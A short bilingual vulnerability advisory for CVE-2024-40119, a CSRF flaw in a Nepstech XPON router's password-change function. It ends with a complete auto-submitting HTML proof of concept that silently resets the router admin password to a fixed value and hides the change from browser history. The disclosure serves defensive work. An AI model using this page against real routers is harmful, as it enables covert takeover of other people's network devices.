
Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover. 비밀번호 변경 기능의 교차 사이트 요청 위조(CSRF) 취약점으로, 원격 공격자가 사용자의 동의 없이 관리자 비밀번호를 변경할 수 있어 잠재적인 계정 탈취로 이어질 수 있습니다.
Subhodeep Baroi
CVE-2024-40119은(는) Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 펌웨어 v2.0.1의 CSRF(교차 사이트 요청 위조) 취약점입니다. 이 취약점을 통해 원격 공격자는 사용자의 동의 없이 관리자 비밀번호를 변경하여 잠재적인 계정 탈취로 이어질 수 있습니다.
원격 공격자는 인증된 사용자가 방문할 때 비밀번호 변경 기능을 트리거하는 악성 HTML 페이지를 만들 수 있습니다. 아래는 샘플 공격 벡터입니다:
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
<input type="hidden" name="name0" value="admin" />
<input type="hidden" name="name1" value="user" />
<input type="hidden" name="name2" value="user3" />
<input type="hidden" name="oldUsername" value="admin" />
<input type="hidden" name="newUsername" value="" />
<input type="hidden" name="oldPassword" value="" />
<input type="hidden" name="newPassword" value="UserUser2@" />
<input type="hidden" name="cfmPassword" value="UserUser2@" />
<input type="hidden" name="accountflg" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>